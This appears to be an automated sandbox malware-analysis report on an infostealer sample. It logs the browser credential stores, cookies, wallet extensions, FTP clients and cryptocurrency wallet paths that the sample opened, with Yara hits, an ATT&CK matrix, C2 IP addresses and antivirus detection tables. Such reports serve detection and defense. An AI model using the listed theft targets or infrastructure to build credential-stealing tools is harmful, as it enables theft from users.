                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\4.10.2209.1\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-gmpopenh264\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-gmpopenh264\1.8.1.1\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\crashes\events\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\saved-telemetry-pings\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\gmp-widevinecdm\key4.db
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZH
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZH
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMA
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMA
                        Source: Yara matchFile source: 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED
                        Source: Yara matchFile source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\94CwbGg[1].exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1015305001\94CwbGg.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting
                        Valid Accounts21
                        Windows Management Instrumentation
                        1
                        Scripting
                        1
                        Abuse Elevation Control Mechanism
                        11
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        1
                        Credentials in Registry
                        14
                        File and Directory Discovery
                        Remote Desktop Protocol41
                        Data from Local System
                        1
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Command and Scripting Interpreter
                        121
                        Scheduled Task/Job
                        1
                        Access Token Manipulation
                        31
                        Obfuscated Files or Information
                        Security Account Manager49
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts121
                        Scheduled Task/Job
                        1
                        Registry Run Keys / Startup Folder
                        312
                        Process Injection
                        431
                        Software Packing
                        NTDS1
                        Query Registry
                        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        PowerShell
                        Network Logon Script121
                        Scheduled Task/Job
                        1
                        Timestomp
                        LSA Secrets661
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        Registry Run Keys / Startup Folder
                        1
                        DLL Side-Loading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        File Deletion
                        DCSync341
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job113
                        Masquerading
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt341
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadow1
                        Remote System Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation
                        Network Sniffing1
                        System Network Configuration Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                        Process Injection
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575244 Sample: file.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 159 Found malware configuration 2->159 161 Malicious sample detected (through community Yara rule) 2->161 163 Antivirus detection for URL or domain 2->163 165 17 other signatures 2->165 10 skotes.exe 55 2->10         started        15 file.exe 5 2->15         started        17 skotes.exe 2->17         started        19 5 other processes 2->19 process3 dnsIp4 153 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->153 155 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 10->155 157 2 other IPs or domains 10->157 111 C:\Users\user\AppData\...\dce9e93496.exe, PE32 10->111 dropped 113 C:\Users\user\AppData\...\82bc687fc3.exe, PE32 10->113 dropped 115 C:\Users\user\AppData\...\b2d27d0fa4.exe, PE32 10->115 dropped 123 39 other malicious files 10->123 dropped 217 Hides threads from debuggers 10->217 219 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->219 221 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->221 21 LoaderClient.exe 10->21         started        25 C1J7SVw.exe 8 10->25         started        27 0d47c4c34f.exe 4 10->27         started        37 5 other processes 10->37 117 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->117 dropped 119 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->119 dropped 223 Detected unpacking (changes PE section rights) 15->223 29 skotes.exe 15->29         started        225 Multi AV Scanner detection for dropped file 17->225 227 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 17->227 229 Writes many files with high entropy 17->229 121 C:\Windows\System32\config\...\output[1].png, PNG 19->121 dropped 231 Suspicious powershell command line found 19->231 233 Creates files in the system32 config directory 19->233 235 Found strings related to Crypto-Mining 19->235 237 3 other signatures 19->237 31 graph.exe 19->31         started        33 powershell.exe 19->33         started        35 explorer.exe 19->35         started        file5 signatures6 process7 dnsIp8 93 C:\Users\user\...\win32ui.cp310-win_amd64.pyd, PE32+ 21->93 dropped 95 C:\Users\...\win32trace.cp310-win_amd64.pyd, PE32+ 21->95 dropped 97 C:\Users\...\win32api.cp310-win_amd64.pyd, PE32+ 21->97 dropped 105 68 other files (65 malicious) 21->105 dropped 167 Found pyInstaller with non standard icon 21->167 40 LoaderClient.exe 21->40         started        99 C:\Users\user\AppData\Local\Temp\...\file.bin, Zip 25->99 dropped 107 2 other files (none is malicious) 25->107 dropped 169 Multi AV Scanner detection for dropped file 25->169 171 Writes many files with high entropy 25->171 43 cmd.exe 2 25->43         started        101 C:\Users\user\AppData\Local\...\axplong.exe, PE32 27->101 dropped 173 Antivirus detection for dropped file 27->173 175 Detected unpacking (changes PE section rights) 27->175 177 Machine Learning detection for dropped file 27->177 179 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 27->179 46 axplong.exe 27->46         started        189 3 other signatures 29->189 181 Found direct / indirect Syscall (likely to bypass EDR) 31->181 48 PING.EXE 33->48         started        51 conhost.exe 33->51         started        147 149.154.167.220 TELEGRAMRU United Kingdom 37->147 149 149.154.167.99 TELEGRAMRU United Kingdom 37->149 151 4 other IPs or domains 37->151 103 C:\Program Files\...\graph.exe, PE32+ 37->103 dropped 109 3 other malicious files 37->109 dropped 183 Detected unpacking (overwrites its own PE header) 37->183 185 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 37->185 187 Tries to harvest and steal ftp login credentials 37->187 191 4 other signatures 37->191 53 b1dc05533c.exe 37->53         started        55 conhost.exe 37->55         started        57 graph.exe 37->57         started        file9 signatures10 process11 dnsIp12 193 Hides threads from debuggers 40->193 59 cmd.exe 40->59         started        125 C:\Users\user\AppData\...\file.zip (copy), Zip 43->125 dropped 195 Uses cmd line tools excessively to alter registry or file data 43->195 197 Writes many files with high entropy 43->197 61 in.exe 43->61         started        65 7z.exe 43->65         started        67 7z.exe 43->67         started        69 9 other processes 43->69 199 Detected unpacking (changes PE section rights) 46->199 201 Tries to detect sandboxes and other dynamic analysis tools (window names) 46->201 203 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 46->203 211 2 other signatures 46->211 141 127.1.10.1 unknown unknown 48->141 143 172.67.139.78 CLOUDFLARENETUS United States 53->143 205 Query firmware table information (likely to detect VMs) 53->205 207 Found many strings related to Crypto-Wallets (likely being stolen) 53->207 209 Tries to harvest and steal ftp login credentials 53->209 213 2 other signatures 53->213 file13 signatures14 process15 file16 71 conhost.exe 59->71         started        127 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 61->127 dropped 239 Suspicious powershell command line found 61->239 241 Uses cmd line tools excessively to alter registry or file data 61->241 243 Uses schtasks.exe or at.exe to add and modify task schedules 61->243 73 powershell.exe 61->73         started        76 attrib.exe 61->76         started        78 attrib.exe 61->78         started        80 schtasks.exe 61->80         started        129 C:\Users\user\AppData\Local\...\file_7.zip, Zip 65->129 dropped 245 Writes many files with high entropy 65->245 131 C:\Users\user\AppData\Local\...\file_6.zip, Zip 67->131 dropped 133 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 69->133 dropped 135 C:\Users\user\AppData\Local\...\file_5.zip, Zip 69->135 dropped 137 C:\Users\user\AppData\Local\...\file_4.zip, Zip 69->137 dropped 139 3 other malicious files 69->139 dropped signatures17 process18 signatures19 215 Uses ping.exe to check the status of other devices and networks 73->215 82 PING.EXE 73->82         started        85 conhost.exe 73->85         started        87 conhost.exe 76->87         started        89 conhost.exe 78->89         started        91 conhost.exe 80->91         started        process20 dnsIp21 145 127.0.0.1 unknown unknown 82->145

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe47%ReversingLabsWin32.Infostealer.Tinba
                        file.exe100%AviraTR/Crypt.TPM.Gen
                        file.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe100%AviraTR/ATRAPS.Gen
                        C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe100%AviraTR/AD.Nekark.eiqyn
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe100%AviraTR/AD.Nekark.eiqyn
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe100%AviraHEUR/AGEN.1306956
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe100%AviraHEUR/AGEN.1312567
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe100%AviraTR/AD.Nekark.eiqyn
                        C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe100%AviraTR/AD.Nekark.eiqyn
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe100%AviraTR/AD.Nekark.eiqyn
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AzVRM7c[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[3].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\Bxq1jd2[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\wOKhy9f[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\dwVrTdy[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\K6UAlAU[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\t5abhIx[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\H9TU4oY[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\ZiYbk6W[1].exe100%Joe Sandbox ML
